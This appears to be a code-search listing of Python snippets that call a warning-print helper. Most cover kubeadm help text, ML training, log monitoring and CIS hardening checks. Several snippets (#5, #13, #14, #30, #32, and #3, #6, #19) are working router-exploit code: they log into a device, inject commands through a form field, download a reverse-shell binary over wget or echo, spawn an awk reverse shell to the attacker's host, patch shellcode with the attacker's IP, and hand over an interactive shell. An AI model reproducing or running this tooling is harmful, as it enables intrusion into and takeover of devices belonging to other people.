Example #1
def print_help_external_ca(hi):
    """ help for external ca installation """

    utils.print_H1('How to setup an external Certificate Authority')
    utils.print_normal(
        'By default an external CA will be automatically installed by `kubeadm-playground create` ',
        'in case your cluster is configured with `certificateAuthority: external`'
    )
    if hi.cluster.certificateAuthority != kubeadm_utils.CERTIFICATEAUTHORITY_TYPE_EXTERNAL:
        print()
        utils.print_warning(
            'The kubeadm playground currently does not require an external ca.',
            'Please change your cluster api specification')

    utils.print_H2('Assisted mode')
    utils.print_normal(
        "* only if automatic installation was disabled during create")
    utils.print_code("kubeadm-playground exec external-ca")

    utils.print_H2('Manual mode')
    ssh_to(hi.bootstrapMaster.name)
    utils.print_normal('- Create an external CA by executing:')
    utils.print_code(
        "sudo %s alpha phase certs all --config /etc/kubernetes/kubeadm.conf" %
        (hi.kubeadm_binary), 'sudo rm /etc/kubernetes/pki/ca.key',
        'sudo rm /etc/kubernetes/pki/front-proxy-ca.key')
    print()
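Note that the examples in this listing never show the print helpers themselves. Below is a minimal sketch of what a project-local utils module of this kind might look like; the ANSI codes, the [!] prefix, and the exact signatures are assumptions, since each project ships its own implementation (the multi-argument signatures are inferred from the call sites above):

import sys

def print_warning(*messages):
    # Each message on its own line, in yellow, prefixed with [!]
    for msg in messages:
        sys.stderr.write("\033[93m[!] %s\033[0m\n" % msg)

def print_H1(title):
    # Top-level help heading, underlined with '='
    print(title)
    print("=" * len(title))

def print_normal(*lines):
    # Plain body text, one argument per line
    for line in lines:
        print(line)

def print_code(*lines):
    # Indent command lines so they stand out from the surrounding text
    for line in lines:
        print("    " + line)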
Example #2
def print_help_external_etcd(hi):
    """ help for external etcd installation """

    utils.print_H1('How to install an external Etcd')
    utils.print_normal(
        'By default an external etcd will be automatically installed by `kubeadm-playground create` ',
        "in case your cluster has machines with role '%s'." %
        (cluster_api.ROLE_ETCD))
    if len(hi.etcds) == 0:
        print()
        utils.print_warning(
            'The kubeadm playground currently does not require an external etcd.',
            'Please change your cluster api specification')

    utils.print_H2('Assisted mode')
    utils.print_normal(
        "* only if automatic installation was disabled during create")
    utils.print_code("kubeadm-playground exec external-etcd")

    utils.print_H2('Manual mode')
    utils.print_normal('- Install etcd on the following machines:')
    for m in hi.etcds:
        utils.print_normal("   - %s" % (m.name))
    print()
    utils.print_normal(
        "- Ensure that the etcd endpoints and, if applicable, the etcd TLS certificates are set in '/etc/kubernetes/kubeadm.conf' on %s"
        % (hi.bootstrapMaster.name))
    print()
Example #3
    def login(self, host, port, timeout):
        url = 'http://{}:{}/'.format(host, port)
        resp, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, err)
            return False

        utils.print_info('"Retrieving random login token..."')
        token = self.regx_grab(resp.text, r'Frm_Logintoken"\)\.value = "(.*)";', 1)
        if token:
            utils.print_info(
                "Trying to log in with credentials {} : {}".format(self.username, self.password))
            url = 'http://{}:{}/'.format(host, port)
            data = {"Frm_Logintoken": token,
                    "Username": self.username,
                    "Password": self.password,
                    "action": "login"}
            resp, err = self.http_post(self.s, url, timeout, data)
            if err:
                utils.print_warning('{}:{} request error, msg: {}'.format(host, port, type(err).__name__))
                return False
            if "Username" not in resp.text and "Password" not in resp.text:
                utils.print_success("Successful authentication")
                return True
            else:
                return False
        else:
            utils.print_warning('Can not find the login token')
            return False
Example #4
def test_models_parallel(models_dir, out_dir, test_dir=None, test_file=None):
    """Description of test_models_parallel

    17h16m12s DecisionTree done in 16135373ms
    17h25m08s GradientBoosting done in 16671109ms
    18h59m05s RandomForest done in 22307811ms
    18h59m07s AdaBoost done in 22310633ms
    19h18m12s ExtraTrees done in 23455779ms

    """
    models_dir = utils.abs_path_dir(models_dir) + "/"
    models = os.listdir(models_dir)
    utils.create_dir(out_dir)

    if test_dir is not None:
        test_dir = utils.abs_path_dir(test_dir) + "/"
        test_files = os.listdir(test_dir)
        test_file = None
    elif test_file is not None:
        test_files = None
    else:
        utils.print_warning(
            "TODO Error in arg for test_models_parallel() function")
        return  # without this, test_files below would be undefined

    partial_test_model = partial(test_model,
                                 models_dir=models_dir,
                                 test_dir=test_dir,
                                 out_dir=out_dir,
                                 test_files=test_files,
                                 test_file=test_file)
    pool = multiprocessing.Pool(len(models))
    pool.map(partial_test_model, models)  #make our results with a map call
    pool.close()  #we are not adding any more processes
    pool.join()  #tell it to wait until all threads are done before going on
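The fan-out above works because functools.partial freezes every keyword argument, so Pool.map only has to supply the one varying positional argument (the model name). A self-contained sketch of the same pattern, with illustrative names:

import multiprocessing
from functools import partial

def score(model_name, models_dir, out_dir):
    # Stand-in for the real per-model work
    return "%s%s -> %s" % (models_dir, model_name, out_dir)

if __name__ == "__main__":
    worker = partial(score, models_dir="models/", out_dir="out/")
    with multiprocessing.Pool(2) as pool:
        print(pool.map(worker, ["DecisionTree", "RandomForest"]))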
Example #5
    def wget(self, binary, location):
        print_warning("Using wget method")
        # generate binary
        self.generate_binary(self.lhost, self.lport)

        # run http server
        thread = threading.Thread(target=self.http_server,
                                  args=(self.lhost, self.lport))
        thread.start()

        # wget binary
        print_warning("Using wget to download binary")
        cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, self.lhost,
                                                   self.lport,
                                                   self.binary_name, location,
                                                   self.binary_name)

        self.exploit.execute(cmd)

        # execute binary
        sock = self.listen(self.lhost, self.lport)
        self.execute_binary(location, self.binary_name)

        # waiting for shell
        self.shell(sock)
Example #6
    def check(self, host, port, timeout):
        utils.print_info('Use username: {}, password: {}'.format(self.username, self.password))
        if self.input_to_continue():
            if self.login(host, port, timeout):
                url = self.check_url.format(host, port)
                resp, err = self.http_get(self.s, url, timeout)
                if err:
                    self.print_requests_err(host, port, err)
                    self.print_check_result(False, host)
                else:
                    textarea_1_match = re.compile(r'textarea cols="" rows="" class="textarea_1"', re.S).search(resp.text)
                    if textarea_1_match:
                        self.print_check_result(True, host)
                        return True
                    else:
                        utils.print_warning('Device is busy, please wait')
                        return False
            else:
                utils.print_failed('Login failed')
                self.print_check_result(False, host)
                return False
        else:
            self.set_credits()
            return self.check(host, port, timeout)

        return False
Example #7
def run_kea_on_folds(folds_dir):
    """Description of run_kea_on_folds

    Wrapper for kea on folds
    """
    folds_dir = utils.abs_path_dir(folds_dir)
    out_file = folds_dir + "/results.txt"
    if os.path.exists(folds_dir + "/train_test.arff"):
        train_file = folds_dir + "/train_test.arff"
        test_file = train_file
        run_kea(train_file, test_file, out_file)
    else:
        nb_folds = len([
            name for name in os.listdir(folds_dir)
            if os.path.isfile(os.path.join(folds_dir, name))
        ])
        # Run on multiple train/test
        for index in range(1, int(nb_folds / 2) + 1):
            utils.print_success("Train/Test on fold " + str(index))
            train_file = folds_dir + "/train_" + str(index).zfill(2) + ".arff"
            test_file = folds_dir + "/test_" + str(index).zfill(2) + ".arff"
            out_file = folds_dir + "/results_" + str(index).zfill(2) + ".arff"
            run_kea(train_file, test_file, out_file)

        utils.print_warning("TODO multiprocessing")
Example #8
def print_help_external_vip(hi):
    """ help for external vip installation """
    
    utils.print_H1('How to setup an external Vip/load balancer')
    utils.print_normal(
        'By default an external vip/load balancer will be automatically installed by `kubeadm-playground create` ',
        "in case your cluster has more than one machine with role '%s'." % (cluster_api.ROLE_MASTER))
    if len(hi.masters) <= 1:  # a vip is only required when there is more than one master
        print()
        utils.print_warning('The kubeadm playground currently does not require an external vip.',
                            'Please change your cluster api specification')

    utils.print_normal(
        "The vip address will be %s (%s) and will balance the following api server endpoints:" %
        (hi.kubernetes_vip_fqdn, hi.kubernetes_vip_ip))
    for m in hi.masters:
        utils.print_normal("- https://%s:6443" % (m.ip))

    print()
    utils.print_H2('Assisted mode')
    utils.print_normal('* only if automatic installation was disabled during create')
    utils.print_normal('If automatic installation of external vip was disabled during create, it can be invoked afterwards with:')
    utils.print_code("kubeadm-playground exec external-vip")

    utils.print_H2('Manual mode')
    utils.print_normal('- Create an external VIP/load balancer similar to what is described above.')
    utils.print_normal("- Ensure that the VIP address is set in '/etc/kubernetes/kubeadm.conf' on %s." % (hi.bootstrapMaster.name))
    print()
Example #9
def print_help_kubeadm_join(hi):
    utils.print_H1("How to execute kubeadm join")
    if len(hi.nodes) == 0:
        print()
        utils.print_warning(
            'The kubeadm playground currently does not have worker nodes.',
            'Please change your cluster api specification')

    utils.print_H2('Assisted mode')
    utils.print_code("kubeadm-playground exec kubeadm-join")

    utils.print_H2('Manual mode')
    utils.print_normal(
        "Repeat the following steps for all the machines with role '%s'" %
        (cluster_api.ROLE_NODE))
    if hi.kubernetes_cni_sysconf:
        utils.print_normal(
            "- Make required changes for %s CNI plugin to work:" %
            (hi.networkAddon))
        utils.print_code('sudo sysctl net.bridge.bridge-nf-call-iptables=1')
    utils.print_normal('- Join the worker node')
    utils.print_code(
        "sudo %s join %s:6443 --token %s \\" %
        (hi.kubeadm_binary, hi.controlplaneEndpoint, hi.kubeadm_token),
        "         --discovery-token-unsafe-skip-ca-verification")
Example #10
    def start(self):
        """
        Start processing the log file.
        """
        print_info(f"Start monitoring {self.log_file}")
        with open(self.log_file) as log_file:
            reader = DictReader(log_file)

            # Keep track of the number of requests in the log window.
            request_counts = []
            while True:
                try:
                    timestamp, average_bytes, most_hit_section, count = self.read_logs(reader, self.log_interval)
                    print_info(f"{timestamp}\t{average_bytes:.2f}\t{most_hit_section}")

                    request_counts.append(count)
                    # Only keep enough counts to cover the time in the log window.
                    request_counts = request_counts[-(self.log_window // self.log_interval):]
                    requests_per_second = sum(request_counts) / self.log_window

                    # Check if the requests per second has exceeded or recovered from the traffic threshold.
                    if requests_per_second >= self.threshold and self.high_traffic is False:
                        print_error(f"High traffic generated an alert - hits = {requests_per_second:.2f} requests per "
                                    f"second, triggered at {timestamp}")
                        self.high_traffic = True
                    elif requests_per_second < self.threshold and self.high_traffic is True:
                        print_success(f"Traffic has stabilized - hits = {requests_per_second:.2f} requests per second, "
                                      f"recovered at {timestamp}")
                        self.high_traffic = False

                    # Simulate time passing. DO NOT USE for real access logs.
                    time.sleep(self.log_interval)
                except StopIteration:
                    print_warning("End of file has been reached.")
                    break
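The window arithmetic above keeps just enough per-interval counts to cover the alert window. With hypothetical settings of a 120-second window polled every 10 seconds, that is the last 12 entries:

log_window, log_interval = 120, 10                        # assumed values, for illustration
request_counts = [40] * 20                                # one count per 10-second read
recent = request_counts[-(log_window // log_interval):]   # keep only the last 12 counts
requests_per_second = sum(recent) / log_window            # 12 * 40 / 120 = 4.0 req/s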
Example #11
    def cmdloop(self, intro=None):
        self.generate_prompt()
        while True:
            try:
                super(BaseInterpreter, self).cmdloop()
                break
            except KeyboardInterrupt:
                utils.print_warning('^C')
Example #12
def preprocess_testset():
    utils.print_success("Preprocessing test set")
    utils.print_warning("Preprocessing whole test set since the beginning")
    groundtruths = utils.get_test_gts()
    new_file = open("vqmm/test.txt", "w")
    with open("vqmm/old.txt", "r") as filep:
        for line in filep:
            if line[56:68] in groundtruths:
                new_file.write(line)
    new_file.close()
Example #13
    def awk(self, binary):
        print_warning("Using awk method")

        # run reverse shell through awk
        sock = self.listen(self.lhost, self.lport)
        cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
        self.exploit.execute(cmd)

        # waiting for shell
        self.shell(sock)
Example #14
    def shell(self, sock):
        print_warning("Waiting for reverse shell...")
        client, addr = sock.accept()
        sock.close()
        print_warning("Connection from {}:{}".format(addr[0], addr[1]))

        print_success("Enjoy your shell")
        t = telnetlib.Telnet()
        t.sock = client
        t.interact()
Example #15
def test_model(model, models_dir, test_dir, out_dir, test_files=None, test_file=None):
    """Description of test_model

    Use one model previously fitted in order to predict_proba() or predict()
    the tag for a bunch of test_files 

    ..todo::
    
    To enhance computation time: only compute file which are in groundtruths
    if file already computed, do not recompute

    """
    begin = int(round(time.time() * 1000))
    utils.print_success("Testing " + model)
    pred_dir = out_dir + model
    clf = joblib.load(models_dir + model + "/" + model + ".pkl")
    if test_files is not None:
        pred_dir = pred_dir + "/"
        utils.create_dir(pred_dir)
        for index, test_file in enumerate(test_files):
            # Check if isrc is in groundtruths to speed up computation time
            if test_file[:12] in groundtruths:
                test_features = read_test_file(test_dir + test_file)
                try:
                    predictions = clf.predict_proba(test_features)
                except AttributeError:
                    utils.print_warning("predict_proba does not exists for " + model + "\nRegular predict function is used.")
                    predictions = clf.predict(test_features)
                with open(pred_dir + test_file, "w") as filep:
                    for pred in predictions:
                        filep.write(str(pred[0]) + "\n")
    elif test_file is not None:
        pred_dir = pred_dir + "_"
        test_features = []
        filename = []
        with open(test_file, "r") as filep:
            for index, line in enumerate(filep):
                line = line.split(",")
                # print(str(index) + " " + line[0])
                test_features.append(line[1:-1])
                filename.append(line[0])
        try:
            predictions = clf.predict_proba(test_features)
            with open(pred_dir + "predict_proba.csv", "a") as filep2:
                for filen, pred in zip(filename, predictions):
                    filep2.write(filen + "," + str(pred[0]) + "\n")
        except Exception:
            pass
        predictions = clf.predict(test_features)
        with open(pred_dir + "predict.csv", "a") as filep2:
            for filen, pred in zip(filename, predictions):
                filep2.write(filen + "," + str(pred[0]) + "\n")
    else:
        utils.print_error("Error in arg for test_model() function")
    utils.print_info(model + " done in " + str(int(round(time.time() * 1000)) - begin) + "ms")
Example #16
def get_returncode():
    clear_historical_outputs()
    give_command("echo $?")
    output = poll_output(timeout=1000)
    if output.isdigit():
        return int(output)
    elif len(output) == 0:
        return -1
    else:
        utils.print_warning(
            "[WARNING] get_returncode() returned other output: %s" % output)
        return output
Example #17
    def load_hyperparams(self):
        try:
            with open(self.path_hyperparams_file, 'r') as fp:
                self.hyper = json.load(fp)
        except Exception as e:
            handle_warning(
                "Failed to load hyper parameters file '{0}'.".format(
                    self.path_hyperparams_file), e)
            print_warning("Using default hyper parameters instead...")
            return None

        return self.hyper
Example #18
def merge_arff(indir, outfilename):
    """Description of merge_arff

    bextract programm from Marsyas generate one output file per audio file
    This function merge them all in one unique file
    Check if analysed file are valid i.e. not empty
    """
    utils.print_success("Preprocessing ARFFs")
    indir = utils.abs_path_dir(indir)
    tmpfilename = "tmp_arff.txt"
    os.system("ls " + indir + " > " + tmpfilename)
    with open(tmpfilename, 'r') as filenames:
        outfn = open(outfilename, 'w')
        cpt_invalid_fn = 0
        # Write first lines of ARFF template file
        for filename in filenames:
            filename = validate_arff(indir + "/" + filename[:-1])
            if filename:
                with open(filename, 'r') as template:
                    nb_line = 77
                    for line in template:
                        if not nb_line:
                            break
                        nb_line -= 1
                        outfn.write(line)
                    break
            else:
                cpt_invalid_fn += 1
        # Append all arff file to the output file
        cur_file_num = 1
        for filename in filenames:
            filename = validate_arff(indir + "/" + filename[:-1])
            if filename:
                cur_file_num = cur_file_num + 1
                sys.stdout.write("\r\tAnalysing file\t" + str(cur_file_num))
                sys.stdout.flush()
                fname = open(filename, 'r')
                outfn.write("".join(fname.readlines()[74:77]))
                fname.close()
            else:
                cpt_invalid_fn += 1
        sys.stdout.write('\n')
        sys.stdout.flush()
        outfn.close()
    os.remove(tmpfilename)
    if cpt_invalid_fn:
        utils.print_warning(str(cpt_invalid_fn) + " ARFF with errors found")
    utils.print_success("Preprocessing done")
    return outfilename
Example #19
    def execute(self, host, port, timeout, cmd):
        self.post_data['Host'] = self.command.format(cmd)
        self.result_data['Host'] = self.command.format(cmd)
        self.check_url = self.check_url.format(host, port)
        resp, err = self.http_post(self.s, self.check_url, timeout, self.post_data)
        if err:
            utils.print_warning(err)

        time.sleep(5)

        resp, err = self.http_post(self.s, self.check_url, timeout, self.result_data)
        if err:
            self.print_requests_err(host, port, err)
            return ''
        return self.regx_grab(resp.text, r'textarea_1">(.*?)</textarea>', 1)
Example #20
    def read_checkpoint_file(self):
        """Read the 'checkpoint.json' file and update the class variables accordingly."""
        checkpoint = None
        if os.path.isfile(self.path_checkpoint_file):
            print_positive("Found checkpoint file: {}".format(
                self.path_checkpoint_file))
            print_info("Verifying integrity of checkpoint file...")
            try:
                with open(self.path_checkpoint_file, "r") as fp:
                    try:
                        checkpoint = json.load(fp)
                    except ValueError as e:
                        handle_error(
                            "Failed to open checkpoint file '{0}'. ".format(
                                self.path_checkpoint_file) +
                            "It does not appear to be a valid JSON file.", e)
                        checkpoint = None
            except IOError as e:
                handle_error(
                    "Unable to open checkpoint file '{}' for reading.".format(
                        self.path_checkpoint_file), e)
        if checkpoint is not None:
            ### Successfully loaded checkpoint file, gather the data!
            print_positive(
                "Successfully loaded checkpoint! Reading its data...")
            self.epochs_completed = checkpoint['epochs_completed']
            if checkpoint['model'] != settings.MODEL:
                print_warning(
                    "Inconsistency detected: the checkpoint model '{0}' does not match command line argument of '{1}'."
                    .format(checkpoint['model'], settings.MODEL))
                print_info("Discarding checkpoint and starting from scratch.")
                return None
            if checkpoint['exp_name'] != settings.EXP_NAME:
                print_warning(
                    "Inconsistency detected: the checkpoint experiment name '{0}' does not match command line argument of '{1}'."
                    .format(checkpoint['exp_name'], settings.EXP_NAME))
                print_info("Discarding checkpoint and starting from scratch.")
                return None

            self.wall_time = checkpoint['wall_time']
            self.process_time = checkpoint['process_time']
        else:
            ### Failed to find or open the checkpoint file: reset the counters to 0.
            self.epochs_completed = 0
            self.wall_time = 0
            self.process_time = 0

        return checkpoint
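For reference, a checkpoint.json that the reader above would accept needs at least the keys it consumes; the key names are taken from the code, the values here are purely illustrative:

import json

checkpoint = {
    "epochs_completed": 12,
    "model": "gan",            # must match settings.MODEL or the checkpoint is discarded
    "exp_name": "run_01",      # must match settings.EXP_NAME or the checkpoint is discarded
    "wall_time": 3600.0,
    "process_time": 3500.0,
}
with open("checkpoint.json", "w") as fp:
    json.dump(checkpoint, fp, indent=2)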
Example #21
def merge_arff(indir, outfilename):
    """Description of merge_arff

    bextract program from Marsyas generate one output file per audio file
    This function merge them all in one unique file
    Check if analysed file are valid i.e. not empty
    """
    utils.print_success("Preprocessing ARFFs")
    indir = utils.abs_path_dir(indir)
    filenames = os.listdir(indir)
    outfn = open(outfilename, 'w')
    cpt_invalid_fn = 0
    # Write first lines of ARFF template file
    for filename in filenames:
        if os.path.isfile(indir + filename):
            new_fn = validate_arff(indir + filename)
            if new_fn:
                with open(new_fn, 'r') as template:
                    nb_line = 74
                    for line in template:
                        if not nb_line:
                            break
                        nb_line -= 1
                        outfn.write(line)
                    break
            else:
                cpt_invalid_fn += 1
    # Append all arff file to the output file
    cur_file_num = 1
    for filename in filenames:
        if os.path.isfile(indir + filename):
            new_fn = validate_arff(indir + filename)
            if new_fn:
                cur_file_num = cur_file_num + 1
                utils.print_progress_start("Analysing file\t" +
                                           str(cur_file_num))
                fname = open(new_fn, 'r')
                outfn.write("".join(fname.readlines()[74:77]))
                fname.close()
            else:
                cpt_invalid_fn += 1
    utils.print_progress_end()
    outfn.close()
    # os.system("rm " + indir + "*.arff")
    if cpt_invalid_fn:
        utils.print_warning(
            str(cpt_invalid_fn) + " ARFF files with errors found")
    return outfilename
Example #22
def delete_vm(vm):
    if vm not in configs.sla_configs:
        utils.print_error("There isn't a VM named '%s'" % vm)
        print("All available VM names:")
        print('\n'.join(configs.sla_configs.keys()))
        return

    utils.print_highlight("====Deleting %s====" % vm)
    cfg = configs.sla_configs[vm]
    utils.print_highlight("Deleting vm: %s" % vm)
    if cfg['vm_type'] == "server":
        delete_server_instance(cfg['deploy_config']['INSTANCE_NAME'],
                               cfg['deploy_config']['KEY_NAME'], vm)
    else:
        utils.print_warning(
            "Cannot delete - Unknown or yet-to-implement VM type: %s" %
            cfg['vm_type'])
Example #23
def login(driver):
    username = input('Enter UM username: ')
    password = input('Enter UM password: ')
    # the steps that submit the credentials were redacted ('******') in the source listing
    driver.find_element_by_id('loginSubmit').click()

    if driver.find_element_by_id('title').text == "Two-Factor Authentication Required":
        # Wait for Two Factor Auth
        print_warning("Please accept 2FA authentication request.\n")
        while driver.title != 'College of Engineering Lecture Recordings - Available Courses':
            time.sleep(2)
Example #24
def try_printed_by(struct: FirstOrderStructure, s: SortDecl, elt: str) -> Optional[str]:
    custom_printer_annotation = syntax.get_annotation(s, 'printed_by')

    if custom_printer_annotation is not None:
        assert len(custom_printer_annotation.args) >= 1
        import importlib
        printers = importlib.import_module('printers')
        printer_name = custom_printer_annotation.args[0]
        custom_printer = printers.__dict__.get(printer_name)
        custom_printer_args = custom_printer_annotation.args[1:] \
            if custom_printer is not None else []
        if custom_printer is not None:
            return custom_printer(struct, s, elt, custom_printer_args)
        else:
            utils.print_warning(custom_printer_annotation.span,
                                'could not find printer named %s' % (printer_name,))
    return None
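The lookup above is ordinary dynamic dispatch: import a module by name, fetch an attribute by string, and tolerate its absence. The same pattern against a standard-library module:

import importlib

mod = importlib.import_module("math")   # module name resolved at runtime
fn = mod.__dict__.get("sqrt")           # returns None instead of raising if the name is missing
if fn is not None:
    print(fn(9.0))                      # 3.0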
Example #25
    async def _create_wallet(self):
        """
        Create wallet.
        """

        try:
            utils.print_header("\n\tCreate wallet")
            await wallet.create_wallet(self.pool_name, self.wallet_name, None,
                                       None, None)
        except IndyError as e:
            if e.error_code == 203:
                utils.print_warning("Wallet '%s' already exists.  "
                                    "Skipping wallet creation..." %
                                    str(self.wallet_name))
            else:
                utils.print_error(str(e))
                raise
Example #26
    def load_model(self):
        """Return True if a valid model was found and correctly loaded. Return False if no model was loaded."""
        from shutil import copyfile
        from keras.models import load_model

        chosen_model_path = None
        best_model_path = None
        best_model_glob = glob.glob(settings.MODELS_DIR + "/best_model_*.hdf5")
        if len(best_model_glob) > 0:
            best_model_path = best_model_glob[0]
            chosen_model_path = best_model_path
            print_positive("Loading *best* model with the lowest validation score: {}"
                           .format(best_model_path))
        if best_model_path is None:
            model_epoch_filename = "model_epoch_{0:0>4}.hdf5".format(self.epochs_completed)
            most_recent_model_path = os.path.join(settings.CHECKPOINTS_DIR, model_epoch_filename)
            chosen_model_path = self.model_path
            if not os.path.isfile(chosen_model_path):
                if not os.path.isfile(most_recent_model_path):
                    print_warning("Unexpected problem: cannot find the model's HDF5 file anymore at path:\n'{}'".format(most_recent_model_path))
                    return False
                else:
                    chosen_model_path = most_recent_model_path

            print_positive("Loading last known valid model (this includes the complete architecture, all weights, optimizer's state and so on)!")

        # Check if file is readable first
        try:
            open(chosen_model_path, "r").close()
        except Exception as e:
            handle_error("Lacking permission to *open for reading* the HDF5 model located at\n{}."
                         .format(chosen_model_path), e)
            return False
        
        # Load the actual HDF5 model file
        try:
            self.keras_model = load_model(chosen_model_path)
        except Exception as e:
            handle_error("Unfortunately, the model did not parse as a valid HDF5 Keras model and cannot be loaded for an unkown reason. A backup of the model will be created, after which training will restart from scratch.".format(chosen_model_path), e)
            try:
                copyfile(chosen_model_path, "{}.backup".format(chosen_model_path))
            except Exception as e:
                handle_error("Looks like you're having a bad day. The copy operation failed for an unknown reason. We will exit before causing some serious damage ;). Better luck next time. Please verify your directory permissions and your default umask!.", e)
                sys.exit(-3)
            return False
        return True
Example #27
    async def _create_pool_config(self):
        """
        Create pool configuration from genesis file.
        """
        try:
            utils.print_header("\n\n\tCreate ledger config "
                               "from genesis txn file")

            pool_config = json.dumps(
                {'genesis_txn': self.config.pool_genesis_file})
            await pool.create_pool_ledger_config(self.pool_name, pool_config)
        except IndyError as e:
            if e.error_code == 306:
                utils.print_warning("The ledger already exists, moving on...")
            else:
                utils.print_error(str(e))
                raise
Example #28
    async def _create_pool_config(self):
        """
        Create pool configuration from genesis file.
        """
        try:
            utils.print_header("\n\n\tCreate ledger config "
                               "from genesis txn file")

            pool_config = json.dumps(
                {'genesis_txn': self.config.pool_genesis_file})
            await pool.create_pool_ledger_config(self.pool_name,
                                                 pool_config)
        except IndyError as e:
            if e.error_code == 306:
                utils.print_warning("The ledger already exists, moving on...")
            else:
                utils.print_error(str(e))
                raise
Example #29
    async def _create_wallet(self):
        """
        Create wallet.
        """

        try:
            utils.print_header("\n\tCreate wallet")
            await wallet.create_wallet(self.pool_name,
                                       self.wallet_name,
                                       None, None, None)
        except IndyError as e:
            if e.error_code == 203:
                utils.print_warning(
                    "Wallet '%s' already exists.  "
                    "Skipping wallet creation..." % str(
                        self.wallet_name))
            else:
                utils.print_error(str(e))
                raise
Example #30
    def generate_binary(self, lhost, lport):
        print_warning("Generating reverse shell binary")
        self.binary_name = random_text(8)
        ip = self.convert_ip(lhost)
        port = self.convert_port(lport)

        if self.arch == 'arm':
            self.revshell = self.arm[:0x104] + ip + self.arm[
                0x108:0x10a] + port + self.arm[0x10c:]
        elif self.arch == 'mipsel':
            self.revshell = self.mipsel[:0xe4] + port + self.mipsel[
                0xe6:0xf0] + ip[2:] + self.mipsel[
                    0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
        elif self.arch == 'mips':
            self.revshell = self.mips[:0xea] + port + self.mips[
                0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[
                    2:] + self.mips[0xf8:]
        else:
            print_failed("Platform not supported")
Example #31
    def __exit__(self, *args):
        data_producing.clear()
        try:
            while not data_queue.empty():
                time.sleep(1)
        except KeyboardInterrupt:
            utils.print_info("\rClear remaining tasks...")
            data_queue.queue.clear()
        finally:
            utils.print_warning(
                "All tasks dispatched\nWaiting for already scheduled jobs to finish..."
            )
            for worker in self.start_worker:
                worker.join()
            data_queue.unfinished_tasks = 0

        utils.print_info(
            'Elapsed time: {0:.2f} seconds'.format(time.time() -
                                                   self.start_time))
Example #32
    def echo(self, binary, location):
        print_warning("Using echo method")

        # generate binary
        self.generate_binary(self.lhost, self.lport)
        path = "{}/{}".format(location, self.binary_name)

        size = len(self.revshell)
        num_parts = (size / 30) + 1

        # transfer binary through echo command
        print_warning("Using echo method to transfer binary")
        for i in range(0, num_parts):
            current = i * 30
            print_warning("Transferring {}/{} bytes".format(
                current, len(self.revshell)))

            block = self.revshell[current:current + 30].encode('hex')
            block = "\\x" + "\\x".join(
                a + b for a, b in zip(block[::2], block[1::2]))
            cmd = '$(echo -n -e "{}" >> {})'.format(block, path)
            self.exploit.execute(cmd)

        # execute binary
        sock = self.listen(self.lhost, self.lport)
        self.execute_binary(location, self.binary_name)

        # waiting for shell
        self.shell(sock)
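The hex-escaping in the echo method pairs adjacent hex digits with zip to build shell-safe \xNN escapes. A quick illustration of that trick on its own (in Python 3 spelling, since str.encode('hex') as used above is Python 2 only):

block = b"abc".hex()                    # '616263'
escaped = "\\x" + "\\x".join(a + b for a, b in zip(block[::2], block[1::2]))
print(escaped)                          # \x61\x62\x63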
Example #33
    def warning(self, msg):
        print_warning(msg)
Example #34
File: cis4.py Project: Nemie/syco
    "net.ipv4.conf.default.rp_filter = 1"
)

#
print_header("4.2.8 Enable TCP SYN Cookies (Scored)")
check_equal(
    "/sbin/sysctl net.ipv4.tcp_syncookies",
    "net.ipv4.tcp_syncookies = 1"
)

#
print_header("4.3 Wireless Networking")

#
print_header("4.3.1 Deactivate Wireless Interfaces (Not Scored)")
print_warning("Check manually for wireless interfaces.")
view_output("ifconfig -a")

#
print_header("4.4 Disable IPv6")

#
print_header("4.4.1 Configure IPv6")

#
print_header("4.4.1.1 Disable IPv6 Router Advertisements (Not Scored)")
check_equal(
    "/sbin/sysctl net.ipv6.conf.all.accept_ra",
    'error: "net.ipv6.conf.all.accept_ra" is an unknown key'
)
check_equal(
Example #35
File: cis5.py Project: Nemie/syco
#
print_header("5.1.2 Activate the rsyslog Service (Scored)")
check_equal(
    "rpm -q syslog",
    "package syslog is not installed"
)
check_empty("chkconfig --list | grep syslog")
check_equal_re(
    "chkconfig --list rsyslog",
    "rsyslog.*0:off.*1:off.*2:on.*3:on.*4:on.*5:on.*6:off"
)

#
print_header("5.1.3 Configure /etc/rsyslog.conf (Not Scored)")
print_warning("Manually review the contents of the /etc/rsyslog.conf file to ensure appropriate logging is set. ")
view_output("ls -l /var/log/")

#
print_header("5.1.4 Create and Set Permissions on rsyslog Log Files (Scored)")
print_header(" TODO - Ensure that the log files are logging information")

#
print_header("5.1.5 Configure rsyslog to Send Logs to a Remote Log Host (Scored)")
expect = "^*.*[^I][^I]*@{0}".format(config.general.get_log_server_hostname1())
check_equal(
    "grep '%s' /etc/rsyslog.conf" % expect,
    expect
)

expect = "^*.*[^I][^I]*@{0}".format(config.general.get_log_server_hostname2())
Example #36
File: cis9.py Project: Nemie/syco
__license__ = "???"
__version__ = "1.0.0"
__status__ = "Production"


from utils import check_empty, check_equal, check_equal_re, check_equals, check_not_empty, check_return_code, print_header, view_output, print_warning, print_info

#
print_header("9 System Maintenance")

#
print_header("9.1 Verify System File Permissions)")

#
print_header("9.1.1 Verify System File Permissions (Not Scored)")
print_warning("Check manually for changed files.")
view_output("rpm -Va --nomtime --nosize --nomd5 --nolinkto")

#
print_header("9.1.2 Verify Permissions on /etc/passwd (Scored)")
check_equal('stat -c "%a %u %g" /etc/passwd | egrep "644 0 0"', "644 0 0")

#
print_header("9.1.3 Verify Permissions on /etc/shadow (Scored)")
check_equal('stat -c "%a %u %g" /etc/shadow | egrep "0 0 0"', "0 0 0")

#
print_header("9.1.4 Verify Permissions on /etc/gshadow (Scored)")
check_equal('stat -c "%a %u %g" /etc/gshadow | egrep "0 0 0"', "0 0 0")

#
Example #37
    def check_seq(seq_record):
        fasta_seq_len = len(seq_record.seq)
        if reference_sequence_len != fasta_seq_len:
            utils.print_warning(
                '%s: invalid length %s (%s expected)' % (seq_record.description, fasta_seq_len, reference_sequence_len))
Example #38
File: cis1.py Project: Nemie/syco
#
print_header("1.1.8 Create Separate Partition for /var/log/audit (Scored)")
check_equal("grep '/var/log/audit ' /etc/fstab", "/var/log/audit")

#
print_header("1.1.9 Create Separate Partition for /home (Scored)")
check_equal("grep '/home ' /etc/fstab", "/home")

#
print_header("1.1.10 Add nodev Option to /home (Scored)")
check_equal("grep /home /etc/fstab", "nodev")
